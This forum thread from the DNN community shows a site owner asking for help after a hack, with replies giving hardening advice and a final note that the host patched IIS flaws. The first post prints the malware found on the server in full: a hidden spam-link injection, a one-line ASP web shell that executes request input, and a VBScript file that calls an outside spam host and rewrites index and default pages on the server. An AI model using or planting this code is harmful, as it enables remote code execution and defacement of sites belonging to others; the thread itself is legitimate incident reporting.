Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen

HomeHomeUsing DNN Platf...Using DNN Platf...Administration ...Administration ...website hackedwebsite hacked
Previous
 
Next
New Post
11/28/2014 6:57 PM
 

I am not sure whether this is the right place to ask this question...

Google Webmaster Tools sent me an email to tell me that my website had been hacked and they were right.

My default.aspx was modified and this code was inserted just before the </html> tag:

<div id=linkbyme><li><a href="http://www.mywebsite.com/images/us.asp">house slippers uggs</a></li></div><script>document.getElementById('linkbyme').style.display='none';</script></body>

(I've changed the URL to mywebsite.com as I don't want more unwanted attention directed to my website)

There were two foreign files in the /images folder: logs.asp and us.asp.

The first of these, log.asp, is pretty simple:

<%ExecuteGlobal request("tanya")%>

The next one, us.asp, is longer and seems to do the dirty work (I will include its contents at the end of this message). I have no idea what it does.

My passwords for the Super User and the SQL account were all hard (I've since changed them just in case). What do people think - is this a DNN problem or has my ISP dropped the ball. I am running a completely vanilla installation of DNN 07.03.02 (I was just waiting a day or so before I was going to install v07.03.04 - I had a bad experience being an early adopter of v07.03.03 with the Telrik editor). Any insights greatly appreciated. Thanks.

<%@LANGUAGE="VBSCRIPT" CODEPAGE="65001"%>

<%

Response.Addheader "Content-Type","text/html;charset=utf-8"

if len(Request.QueryString("ugg4"))<>0 Then

    Response.Write GetResStr("http://ugg.wmjren.org/A525/"&"ugg4/"&Request.QueryString("ugg4"))

else

    Response.Write GetResStr("http://ugg.wmjren.org/A525/"&"ugg4/us.asp")

end if

action=request("action")

replacestr=request("replacestr")

If action="createlinks" and replacestr<>"" Then

    Response.Write CreateLink()

End If

Response.End

Function CreateLink()

    set fso=CreateObject("Scripting.FileSystemObject") 

    set fs=fso.GetFolder(Server.MapPath("/")) 

    For Each file In fs.Files

        If instr(LCase(file.name),"index")>0 or instr(LCase(file.name),"default")>0 Then

            set fsofile=fso.OpenTextFile(file, 1, true)

            On Error Resume next

            tempstr=fsofile.Readall

            pos1=instr(tempstr,"<div id=linkbyme>")

            If pos1>0 then

                tempstr=RegexReplace(tempstr,"<div id=linkbyme>(.+?)</body>","</body>")

            End If

            tempstr=replace(tempstr, "</body>", "<div id=linkbyme>"&replacestr&"</div><script>document.getElementById('linkbyme').style.display='none';</script></body>")

            set fsofile1=fso.OpenTextFile(file, 2, true)

            fsofile1.WriteLine tempstr

            fsofile1.close

            CreateLink="linkbyme"

        End If

    Next

    set fso=nothing 

End Function

Function RegexReplace(source1,pattern1,replace1)

    Set re = New RegExp

    re.Pattern = pattern1

    re.Global = True

    re.IgnoreCase = True

    RegexReplace= re.replace(source1,replace1)

End Function

function GetResStr(URL)

dim ResBody,ResStr,PageCode

Set Http=server.createobject("msxml2.serverxmlhttp.3.0")

Http.setTimeouts 10000, 10000, 10000, 10000

Http.open "GET",URL,False

Http.Send()

If Http.Readystate =4 Then

If Http.status=200 Then

ResStr=http.responseText

ResBody=http.responseBody

PageCode="utf-8"

GetResStr=BytesToBstr(http.responseBody,trim(PageCode))

End If

End If

End Function

Function BytesToBstr(Body,Cset)

Dim Objstream

Set Objstream = Server.CreateObject("adodb.stream")

objstream.Type = 1

objstream.Mode =3

objstream.Open

objstream.Write body

objstream.Position = 0

objstream.Type = 2

objstream.Charset = Cset

BytesToBstr = objstream.ReadText

objstream.Close

set objstream = nothing

End Function

%>

 

 

 
New Post
11/28/2014 7:18 PM
 
Please verify that all Microsoft security updates have been applied.
did you make sure to have secure Passwords for all FTP accounts?
There might be a 3rd party extension with a security issue.

Cheers from Germany,
Sebastian Leupold (Microsoft MVP)

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
 
New Post
11/28/2014 7:45 PM
 
Sebastian Leupold wrote:
Please verify that all Microsoft security updates have been applied.
did you make sure to have secure Passwords for all FTP accounts?
There might be a 3rd party extension with a security issue.

Hi Sebastian,

No third party extensions. It is a "right-out-of-the-box" DNN installation. It doesn't get any simpler.

I will file a ticket with my ISP to see whether they have been keeping the security updates up-to-date. The FTP password is a nice mixture of upper  and lower case, numbers and special symbols (quite a pain to type).  According to an online password tester, the FTP password should require 26 million years to be broken. :-) I'm going to change it just in case it has been guessed -- one can't be too careful. I've changed all my other passwords (the super user and admin) just in case as well. They were likewise difficult to guess (requiring in the millions of years).

I will let you know what my ISP says. Thanks.

Steve Karpik

 
New Post
11/29/2014 5:28 AM
 
Steve, I'd also check all pages to make sure, none is granting Edit permission to unauthenticated users.
I am not aware of an existing security bug allowing to upload files. If the Hosting Company did not properly
separate websites, the hacker might have gotten access to another site on the server and use it to affect
your site as well. Please ask the hosting company to check server logs.

Cheers from Germany,
Sebastian Leupold (Microsoft MVP)

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
 
New Post
11/30/2014 10:25 PM
 

Good news - it's not a DotNetNuke problem. There were vulnerabilities in IIS on the web servers at the hosting service that I use which have since been patched.

Thanks for the advice Sebastian.

 
Previous
 
Next
HomeHomeUsing DNN Platf...Using DNN Platf...Administration ...Administration ...website hackedwebsite hacked


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.

Content Layout

Subscribe to DNN Digest

DNN Digest is our monthly email newsletter. It highlights news and content from around the DNN ecosystem, such as new modules and themes, messages from leadership, blog posts and notable tweets. Keep your finger on the pulse of the ecosystem by subscribing.  


Copyright 2017 by DNN Corp Terms of Use Privacy
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out